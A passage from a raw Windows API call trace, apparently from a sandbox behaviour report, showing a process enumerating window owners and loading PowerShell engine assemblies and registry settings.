GetWindowThreadProcessId (in: hWnd=0x10062, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x640 [0049.547] GetLastError () returned 0x514 [0049.547] GetWindowThreadProcessId (in: hWnd=0x10050, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x640 [0049.547] GetLastError () returned 0x514 [0049.547] GetWindowThreadProcessId (in: hWnd=0x200fa, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x4d8 [0049.547] GetLastError () returned 0x514 [0049.547] GetWindowThreadProcessId (in: hWnd=0x100f6, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x398 [0049.547] GetLastError () returned 0x514 [0049.547] GetWindowThreadProcessId (in: hWnd=0x1004c, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x640 [0049.547] GetLastError () returned 0x514 [0049.547] GetWindowThreadProcessId (in: hWnd=0x10038, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x640 [0049.547] GetLastError () returned 0x514 [0049.547] GetWindowThreadProcessId (in: hWnd=0x10030, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x614 [0049.547] GetLastError () returned 0x514 [0049.547] GetWindowThreadProcessId (in: hWnd=0x2002c, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x614 [0049.547] GetLastError () returned 0x514 [0049.547] GetWindowThreadProcessId (in: hWnd=0x20026, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x5cc [0049.547] GetLastError () returned 0x514 [0049.547] GetWindowThreadProcessId (in: hWnd=0x1002a, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x604 [0049.547] GetLastError () returned 0x514 [0049.548] GetWindowThreadProcessId (in: hWnd=0x100ec, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x174 [0049.548] GetLastError () returned 0x514 [0049.548] GetWindowThreadProcessId (in: hWnd=0x100ca, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x614 [0049.548] GetLastError () returned 0x514 [0049.548] GetWindowThreadProcessId (in: hWnd=0x10112, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x664 [0049.548] GetLastError () returned 0x514 [0049.548] GetWindowThreadProcessId (in: hWnd=0x1003e, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x640 [0049.548] GetLastError () returned 0x514 [0049.548] GetWindowThreadProcessId (in: hWnd=0x1003a, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x640 [0049.548] GetLastError () returned 0x514 [0049.548] GetWindowThreadProcessId (in: hWnd=0x301e6, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0xb58 [0049.548] GetLastError () returned 0x514 [0049.548] GetWindowThreadProcessId (in: hWnd=0x101e2, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x960 [0049.548] GetLastError () returned 0x514 [0049.548] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x960 [0049.548] GetLastError () returned 0x514 [0049.548] GetWindowThreadProcessId (in: hWnd=0x10192, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x898 [0049.548] GetLastError () returned 0x514 [0049.548] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x888 [0049.548] GetLastError () returned 0x514 [0049.548] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x878 [0049.548] GetLastError () returned 0x514 [0049.548] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x868 [0049.548] GetLastError () returned 0x514 [0049.548] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x858 [0049.548] GetLastError () returned 0x514 [0049.548] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x848 [0049.548] GetLastError () returned 0x514 [0049.548] GetWindowThreadProcessId (in: hWnd=0x1017a, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x838 [0049.548] GetLastError () returned 0x514 [0049.548] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x828 [0049.548] GetLastError () returned 0x514 [0049.549] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x818 [0049.549] GetLastError () returned 0x514 [0049.549] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x808 [0049.549] GetLastError () returned 0x514 [0049.549] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x624 [0049.549] GetLastError () returned 0x514 [0049.549] GetWindowThreadProcessId (in: hWnd=0x10166, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x1c4 [0049.549] GetLastError () returned 0x514 [0049.549] GetWindowThreadProcessId (in: hWnd=0x10162, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x7ec [0049.549] GetLastError () returned 0x514 [0049.549] GetWindowThreadProcessId (in: hWnd=0x1015e, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x240 [0049.549] GetLastError () returned 0x514 [0049.549] GetWindowThreadProcessId (in: hWnd=0x1015a, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x404 [0049.549] GetLastError () returned 0x514 [0049.549] GetWindowThreadProcessId (in: hWnd=0x10158, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x21c [0049.549] GetLastError () returned 0x514 [0049.549] GetWindowThreadProcessId (in: hWnd=0x10154, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x738 [0049.549] GetLastError () returned 0x514 [0049.549] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x748 [0049.549] GetLastError () returned 0x514 [0049.549] GetWindowThreadProcessId (in: hWnd=0x10148, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x1f4 [0049.549] GetLastError () returned 0x514 [0049.549] GetWindowThreadProcessId (in: hWnd=0x10142, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x320 [0049.549] GetLastError () returned 0x514 [0049.549] GetWindowThreadProcessId (in: hWnd=0x1013c, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x184 [0049.549] GetLastError () returned 0x514 [0049.549] GetWindowThreadProcessId (in: hWnd=0x10136, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x7a0 [0049.549] GetLastError () returned 0x514 [0049.549] GetWindowThreadProcessId (in: hWnd=0x300e0, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x7bc [0049.549] GetLastError () returned 0x514 [0049.549] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x674 [0049.549] GetLastError () returned 0x514 [0049.550] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x778 [0049.550] GetLastError () returned 0x514 [0049.550] GetWindowThreadProcessId (in: hWnd=0x20016, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x18c [0049.550] GetLastError () returned 0x514 [0049.550] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x3cc [0049.550] GetLastError () returned 0x514 [0049.550] GetWindowThreadProcessId (in: hWnd=0x100e8, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x614 [0049.550] GetLastError () returned 0x514 [0049.550] GetWindowThreadProcessId (in: hWnd=0x200fc, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x4d8 [0049.550] GetLastError () returned 0x514 [0049.550] GetWindowThreadProcessId (in: hWnd=0x100f8, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x398 [0049.550] GetLastError () returned 0x514 [0049.550] GetWindowThreadProcessId (in: hWnd=0x1002e, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x614 [0049.550] GetLastError () returned 0x514 [0049.550] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x5cc [0049.550] GetLastError () returned 0x514 [0049.550] GetWindowThreadProcessId (in: hWnd=0x100ee, lpdwProcessId=0x14eb30 | out: lpdwProcessId=0x14eb30) returned 0x174 [0049.550] GetLastError () returned 0x514 [0049.550] GetLastError () returned 0x514 [0049.553] WerSetFlags () returned 0x0 [0049.581] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1 [0049.582] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x14ef0c, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x14ef08 | out: pulNumLanguages=0x14ef0c, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x14ef08) returned 1 [0049.583] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x14ef0c, pwszLanguagesBuffer=0x1f3d60c, pcchLanguagesBuffer=0x14ef08 | out: pulNumLanguages=0x14ef0c, pwszLanguagesBuffer=0x1f3d60c, pcchLanguagesBuffer=0x14ef08) returned 1 [0049.621] GetUserDefaultLocaleName (in: lpLocaleName=0x3175c0, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6 [0049.662] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0049.662] GetLastError () returned 0xcb [0049.665] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0049.665] GetLastError () returned 0xcb [0049.666] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0049.666] GetLastError () returned 0xcb [0049.690] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e97c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0049.690] GetLastError () returned 0xcb [0049.690] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e998, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0049.690] GetLastError () returned 0xcb [0049.690] SetErrorMode (uMode=0x1) returned 0x1 [0049.690] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x14ee18 | out: lpFileInformation=0x14ee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7f02680, ftCreationTime.dwHighDateTime=0x1d2f5d2, ftLastAccessTime.dwLowDateTime=0xb7f02680, ftLastAccessTime.dwHighDateTime=0x1d2f5d2, ftLastWriteTime.dwLowDateTime=0xba2e5500, ftLastWriteTime.dwHighDateTime=0x1cb889e, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1 [0049.690] GetLastError () returned 0xcb [0049.690] SetErrorMode (uMode=0x1) returned 0x1 [0049.690] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x14ee9c | out: lpdwHandle=0x14ee9c) returned 0x94c [0049.691] GetLastError () returned 0x0 [0049.691] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x1f3fb3c | out: lpData=0x1f3fb3c) returned 1 [0049.692] VerQueryValueW (in: pBlock=0x1f3fb3c, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x14ee68, puLen=0x14ee64 | out: lplpBuffer=0x14ee68*=0x1f3fbd8, puLen=0x14ee64) returned 1 [0049.692] VerQueryValueW (in: pBlock=0x1f3fb3c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x14ede4, puLen=0x14ede0 | out: lplpBuffer=0x14ede4*=0x1f3fcb4, puLen=0x14ede0) returned 1 [0049.692] lstrlenW (lpString="Microsoft Corporation") returned 21 [0049.692] lstrcpyW (in: lpString1=0x3175c0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation" [0049.693] VerQueryValueW (in: pBlock=0x1f3fb3c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x14ede4, puLen=0x14ede0 | out: lplpBuffer=0x14ede4*=0x1f3fd08, puLen=0x14ede0) returned 1 [0049.693] lstrlenW (lpString="System.Management.Automation") returned 28 [0049.693] lstrcpyW (in: lpString1=0x3175c0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation" [0049.693] VerQueryValueW (in: pBlock=0x1f3fb3c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x14ede4, puLen=0x14ede0 | out: lplpBuffer=0x14ede4*=0x1f3fd64, puLen=0x14ede0) returned 1 [0049.693] lstrlenW (lpString="6.1.7601.17514") returned 14 [0049.693] lstrcpyW (in: lpString1=0x3175c0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0049.693] VerQueryValueW (in: pBlock=0x1f3fb3c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x14ede4, puLen=0x14ede0 | out: lplpBuffer=0x14ede4*=0x1f3fda4, puLen=0x14ede0) returned 1 [0049.693] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0049.693] lstrcpyW (in: lpString1=0x3175c0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0049.693] VerQueryValueW (in: pBlock=0x1f3fb3c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x14ede4, puLen=0x14ede0 | out: lplpBuffer=0x14ede4*=0x1f3fe0c, puLen=0x14ede0) returned 1 [0049.693] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57 [0049.693] lstrcpyW (in: lpString1=0x3175c0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved." [0049.693] VerQueryValueW (in: pBlock=0x1f3fb3c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x14ede4, puLen=0x14ede0 | out: lplpBuffer=0x14ede4*=0x1f3fea8, puLen=0x14ede0) returned 1 [0049.693] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0049.693] lstrcpyW (in: lpString1=0x3175c0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0049.693] VerQueryValueW (in: pBlock=0x1f3fb3c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x14ede4, puLen=0x14ede0 | out: lplpBuffer=0x14ede4*=0x1f3ff0c, puLen=0x14ede0) returned 1 [0049.693] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42 [0049.693] lstrcpyW (in: lpString1=0x3175c0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System" [0049.693] VerQueryValueW (in: pBlock=0x1f3fb3c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x14ede4, puLen=0x14ede0 | out: lplpBuffer=0x14ede4*=0x1f3ff88, puLen=0x14ede0) returned 1 [0049.693] lstrlenW (lpString="6.1.7601.17514") returned 14 [0049.693] lstrcpyW (in: lpString1=0x3175c0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0049.693] VerQueryValueW (in: pBlock=0x1f3fb3c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x14ede4, puLen=0x14ede0 | out: lplpBuffer=0x14ede4*=0x1f3fc30, puLen=0x14ede0) returned 1 [0049.693] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49 [0049.693] lstrcpyW (in: lpString1=0x3175c0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly" [0049.693] VerQueryValueW (in: pBlock=0x1f3fb3c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x14ede4, puLen=0x14ede0 | out: lplpBuffer=0x14ede4*=0x0, puLen=0x14ede0) returned 0 [0049.694] VerQueryValueW (in: pBlock=0x1f3fb3c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x14ede4, puLen=0x14ede0 | out: lplpBuffer=0x14ede4*=0x0, puLen=0x14ede0) returned 0 [0049.694] VerQueryValueW (in: pBlock=0x1f3fb3c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x14ede4, puLen=0x14ede0 | out: lplpBuffer=0x14ede4*=0x0, puLen=0x14ede0) returned 0 [0049.694] VerQueryValueW (in: pBlock=0x1f3fb3c, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x14edd8, puLen=0x14edd4 | out: lplpBuffer=0x14edd8*=0x1f3fbd8, puLen=0x14edd4) returned 1 [0049.694] VerLanguageNameW (in: wLang=0x0, szLang=0x3175c0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10 [0049.694] VerQueryValueW (in: pBlock=0x1f3fb3c, lpSubBlock="\\", lplpBuffer=0x14edec, puLen=0x14ede8 | out: lplpBuffer=0x14edec*=0x1f3fb64, puLen=0x14ede8) returned 1 [0049.699] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0049.699] GetLastError () returned 0xcb [0049.709] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0049.710] GetLastError () returned 0xcb [0049.712] lstrlenW (lpString="䅁") returned 1 [0049.715] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14edb0 | out: phkResult=0x14edb0*=0x2f8) returned 0x0 [0049.715] RegOpenKeyExW (in: hKey=0x2f8, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x14edb4 | out: phkResult=0x14edb4*=0x2fc) returned 0x0 [0049.715] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14ede8 | out: phkResult=0x14ede8*=0x300) returned 0x0 [0049.716] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14ee28, lpData=0x0, lpcbData=0x14ee24*=0x0 | out: lpType=0x14ee28*=0x1, lpData=0x0, lpcbData=0x14ee24*=0x56) returned 0x0 [0049.717] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14ee28, lpData=0x3175c0, lpcbData=0x14ee24*=0x56 | out: lpType=0x14ee28*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14ee24*=0x56) returned 0x0 [0049.721] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0049.721] GetLastError () returned 0x0 [0049.722] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0049.722] GetLastError () returned 0x0 [0049.733] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0049.733] GetLastError () returned 0x0 [0049.757] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0049.757] GetLastError () returned 0xcb [0049.969] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x14e8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0049.969] GetLastError () returned 0x2 [0049.969] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x14e8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0049.969] GetLastError () returned 0x2 [0050.044] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0050.044] GetLastError () returned 0xcb [0050.045] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0050.045] GetLastError () returned 0xcb [0050.066] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0050.066] GetLastError () returned 0xcb [0050.067] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0050.067] GetLastError () returned 0xcb [0050.067] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0050.067] GetLastError () returned 0xcb [0050.202] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x14e8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0050.202] GetLastError () returned 0x0 [0050.202] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x14e8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0050.202] GetLastError () returned 0x0 [0050.217] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0050.217] GetLastError () returned 0xcb [0050.219] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0050.219] GetLastError () returned 0xcb [0050.254] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.254] GetLastError () returned 0x7e [0050.255] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.255] GetLastError () returned 0x7e [0050.597] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x14e8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0050.597] GetLastError () returned 0x2 [0050.597] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x14e8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0050.597] GetLastError () returned 0x2 [0050.673] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0050.673] GetLastError () returned 0x57 [0050.673] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0050.673] 